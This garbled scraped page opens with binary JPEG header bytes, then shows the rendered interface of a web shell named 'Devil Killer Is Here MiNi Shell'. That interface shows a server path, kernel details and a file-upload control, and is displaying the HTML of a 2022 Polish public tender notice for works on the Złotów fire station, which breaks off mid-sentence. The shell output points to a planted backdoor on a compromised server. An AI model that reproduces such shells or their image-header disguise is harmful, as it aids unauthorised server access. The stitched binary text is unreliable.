JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220415/0012473201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa i przebudowa budynku strażnicy Jednostki Ratowniczo – Gaśniczej i Komendy Powiatowej Państwowej Straży Pożarnej w Złotowie. Etap VI. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Powiatowa Państwowej Straży Pożarnej w Złotowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570798150</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ks. Bolesława Domańskiego 48a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Złotów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">77-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 47 771 99 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">67 222 33 46</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kppspzlotow@psp.wlkp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zlotow.psp.wlkp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa i przebudowa budynku strażnicy Jednostki Ratowniczo – Gaśniczej i Komendy Powiatowej Państwowej Straży Pożarnej w Złotowie. Etap VI. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-725be5ef-bbc1-11ec-97c7-b646b0ba23df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00124732</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00018438/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 ROZBUDOWA I PRZEBUDOWA BUDYNKU STRAŻNICY JEDNOSTKI RATOWNICZO - GAŚNICZEJ I KOMENDY POWIATOWEJ PAŃSTWOWEJ STRAŻY POŻARNEJ W ZŁOTOWIE. ETAP VI.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/straz_zlotow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu<br/>komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji<br/>elektronicznej. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej za pośrednictwem<br/>www.platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/straz_zlotow<br/>Dostęp do platformy jest również dostępny na stronie internetowej zamawiającego w zakładce &#34;zamówienia<br/>publiczne&#34; :https://www.gov.pl/web/kppsp-zlotow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Wszelką korespondencję związaną z niniejszym postępowaniem, należy przekazywać za<br/>pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do<br/>zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej niezwłocznie<br/>potwierdzi fakt otrzymania wiadomości elektronicznej.2. Komunikacja z wykonawcami odbywa się tylko<br/>na Platformie za pośrednictwem formularza „Wyślij wiadomość do zamawiającego”.3. Postępowanie<br/>prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformy zakupowej<br/>(dalej jako „Platforma”) pod adresem: https://platformazakupowa.pl/pn/straz_zlotow 4. Zamawiający<br/>będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany<br/>terminu składania i otwarcia ofert zamawiający będzie zamieszczał na platformie w sekcji<br/>„Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do<br/>konkretnego wykonawcy.5. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania<br/>komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego,<br/>gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.6.<br/>Zamawiający, zgodnie z art. 67 ustawy Pzp oraz rozporządzeniem Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452 ze zm. - dalej:<br/>„Rozporządzenie w sprawie środków komunikacji”), określa niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: a) stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b) komputer klasy PC lub MAC o<br/>następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,c)<br/>zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10<br/>0.,d) włączona obsługa JavaScript,e) zainstalowany program Adobe Acrobat Reader lub inny<br/>obsługujący format plików .pdf,f) Platformazakupowa.pl działa według standardu przyjętego w<br/>komunikacji sieciowej - kodowanie UTF8,7. Oznaczenie czasu odbioru danych przez<br/>platformęzakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego z zegarem Głównego Urzędu Miar.8. Wykonawca, przystępując do<br/>niniejszego postępowania o udzielenie zamówienia publicznego:a) akceptuje warunki korzystania z<br/>platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w<br/>zakładce „Regulamin&#34; oraz uznaje go za wiążący,b) zapoznał i stosuje się do Instrukcji składania<br/>ofert/wniosków dostępnej pod linkiem<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view.9. Zamawiający nie ponosi<br/>odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty<br/>przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do<br/>Zamawiającego”). Taka oferta zostanie uznana przez zamawiającego za ofertę handlową i nie będzie<br/>brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek<br/>narzucony w art. 221 ustawy Pzp i inne wymienione w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy dot. ochrony danych osobowych określono w Rozdziale II SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zapisy dot. ochrony danych osobowych określono w Rozdziale II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PT.2370.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1055250,28 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane – dostosowanie pomieszczeń budynku A do standardów dobudowanych pomieszczeń biurowo – socjalnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45216121-8 - Roboty budowlane w zakresie obiektów straży pożarnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39130000-2 - Meble biurowe</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena brutto (C) – waga kryterium 60%;<br/>2)	Okres gwarancji (G) – waga kryterium 40%<br/>Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.<br/><br/>Całkowita punktowa wartość oferty (W) liczona będzie według wzoru:<br/>W = C + G<br/><br/><br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	Cena brutto (C) – waga 60%<br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt <br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.     <br/>2)	Okres gwarancji (G) min. 24 miesiące – waga 40%<br/><br/>W zakresie tego kryterium oferta może otrzymać: <br/>- za wymagany minimalny okres gwarancji na wykony przedmiot zamówienia tj. 24 miesiące – 0 punktów,<br/>- za dodatkowe miesiące gwarancji (min 6 miesięcy dodatkowych) na wykonany przedmiot zamówienia tj. min 30 miesięcy (24 miesiące wymagane + 6 miesięcy dodatkowych) – 40 punktów.<br/><br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą, czyli taką, która uzyska największą liczbę punktów na podstawie ustalonego kryterium przy jednoczesnym spełnieniu wszystkich warunków określonych w niniejszej SWZ. Pozostałe oferty spełniające warunki SWZ zostaną sklasyfikowane wg zdobytych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.2. O udzielenie zamówienia mogą ubiegać się Wykonawcy,<br/>którzy spełniają warunki dotyczące:1) zdolności do występowania w obrocie<br/>gospodarczym:Zamawiający nie stawia wymagań w zakresie tego warunku.2) uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów:Zamawiający nie stawia wymagań w zakresie tego warunku.3) sytuacji ekonomicznej<br/>lub finansowej:Wykonawca spełni warunek jeżeli oświadczy, że posiada środki finansowe lub<br/>zdolność kredytową w wysokości nie mniejszej niż: - dla zamówienia 200.000,00 PLN.4)<br/>zdolności technicznej lub zawodowej:a) Wykonawca spełni warunek, jeżeli wykaże, że w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie, wykonał należycie minimum jedną robotę budowlaną w zakresach<br/>objętych w zadaniu o wartości brutto co najmniej 400.000,00 PLN brutto oraz wykaże, że roboty<br/>te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.b)<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje przynajmniej jedną osobą posiadającą<br/>uprawnienia do kierowania robotami budowlanymi (ogólnobudowlanymi).Zamawiający może na<br/>każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień<br/>składania ofert oświadczenie dotyczące spełniania warunków udziału w postępowaniu – zgodnie z<br/>Załącznikiem nr 4 do SWZ;2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią<br/>wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z udziału w postępowaniu.3.<br/>Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia,<br/>aktualnych na dzień złożenia podmiotowych środków dowodowych.4. Podmiotowe środki dowodowe<br/>wymagane od wykonawcy obejmują:1) wykaz robót budowlanych wykonanych nie wcześniej niż w<br/>okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich<br/>rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane,<br/>oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w<br/>szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego<br/>i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty - załącznik nr 6 do SWZ;2) wykaz osób, które będą<br/>uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu<br/>wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami wg<br/>wzoru stanowiącego załącznik nr 7 do SIWZ.5. Wykonawca nie jest zobowiązany do złożenia<br/>podmiotowych środków dowodowych, które zamawiający posiada, jeżeli Wykonawca wskaże te środki<br/>oraz potwierdzi ich prawidłowość i aktualność.6. W zakresie nieuregulowanym ustawą PZP lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu<br/>zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie<br/>dotyczące braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 5 do SWZ;2.<br/>Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że<br/>Wykonawca spełnia warunki udziału w postępowaniu.3. Zamawiający wzywa wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków<br/>dowodowych.4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:1) Oświadczenie<br/>wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy<br/>kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.<br/>U. z 2021 r. poz. 275), z innym Wykonawca, który złożył odrębną ofertę, ofertę częściową lub wniosek<br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – załącznik nr 8 do SWZ;2) Odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem,<br/>jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;5. Jeżeli Wykonawca ma siedzibę 